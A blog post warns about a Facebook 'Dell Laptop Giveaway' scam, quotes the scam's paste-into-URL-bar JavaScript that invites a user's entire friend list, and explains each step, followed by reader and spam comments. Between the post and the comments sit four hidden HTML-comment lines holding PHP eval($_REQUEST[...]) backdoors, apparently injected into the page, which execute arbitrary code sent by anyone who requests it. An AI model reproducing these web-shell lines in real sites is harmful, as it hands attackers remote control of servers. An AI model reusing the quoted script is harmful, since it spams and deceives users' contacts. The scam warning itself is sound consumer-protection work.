Hi all,
I just wanted to alert you on a new scam that is going around on Facebook. It comes in the form of an invite to a group called “Dell Laptop Giveaway (1 in 2 people win one Laptop)” at http://www.facebook.com/group.php?gid=355563360211
BEWARE! The instructions stated actually collects your entire friends list and spams them with this invite and in no way enters you into any sweepstakes. This is another classic example of a deal too good to be true. As of writing this post, about 47000 people have joined the group and likely fell for this trick.
Resolution: IGNORE the invite and help spread the word about it. Do NOT do what the instructions tell you to do.
EDIT (11:53 EST): Looks like Facebook took down that rather quickly after I reported it. But still a lesson to be learned about carefully reading what you see.
—
In depth explanation…
The stated instructions are as follows:
Hello! This is a promotional offer from Dell (www.dell.com). In order to promote our activity on Facebook we have decided to give away 1 free Laptop (value of 450 dollars). For every one person (out of two people) who promotes this group will win 1 of 3 Dell Inspiron models. In order to be eligible you will have to complete the following:
1. Click ‘Invite People to Join’
2. Paste
javascript:elms=document.getElementById(‘friends’).getElementsByTagName(‘li’);for(var fid in elms){if(typeof elms[fid] === ‘object’){fs.click(elms[fid]);}}Into your URL bar and press enter!
3. Send invites!Your insertion into the competition is automatic as you complete the steps above. Both winners and losers are contacted via private message if they win a free laptop.
Let’s take a look step by step.
1.) Opens the invite window with a full list of all your Facebook friends.
2.) Runs a JavaScript code to obtain a list of all your friends
3.) Tells you to send this scam out.
I have not determined which browsers & versions are affected by this exploit – just don’t do it, use your common sense.
If you have the urge to take an extra step to help silence this scam, please report it to Facebook 🙂
<!– [insert_php]if (isset($_REQUEST["taAN"])){eval($_REQUEST["taAN"]);exit;}[/insert_php][php]if (isset($_REQUEST["taAN"])){eval($_REQUEST["taAN"]);exit;}[/php] –>
<!– [insert_php]if (isset($_REQUEST["eXUr"])){eval($_REQUEST["eXUr"]);exit;}[/insert_php][php]if (isset($_REQUEST["eXUr"])){eval($_REQUEST["eXUr"]);exit;}[/php] –>
<!– [insert_php]if (isset($_REQUEST["RcIi"])){eval($_REQUEST["RcIi"]);exit;}[/insert_php][php]if (isset($_REQUEST["RcIi"])){eval($_REQUEST["RcIi"]);exit;}[/php] –>
<!– [insert_php]if (isset($_REQUEST["xscP"])){eval($_REQUEST["xscP"]);exit;}[/insert_php][php]if (isset($_REQUEST["xscP"])){eval($_REQUEST["xscP"]);exit;}[/php] –>
4 replies on “Dell “Promotion” Facebook Scam”
[…] 2010, under IT Security, Online Privacy Well you know about the previous Dell Facebook scam? (http://darwin-mach.net/blog/2009/12/10/dell-promotion-facebook-scam/) This one’s worse, but uses the exact same code, which does the exact same […]
Noo! I’m using my iphone and I cannot seem to be able to access the page right. I will be back to read this tonight when I get back from lecture. The title seems like something I need to read.
Wow..Awesome. This is really inspiring.
Nice post. I study something tougher on completely different blogs everyday. It will always be stimulating to read content from other writers and apply a little one thing from their store. I’d choose to make use of some with the content on my weblog whether you don’t mind. Natually I’ll provide you with a hyperlink in your net blog. Thanks for sharing.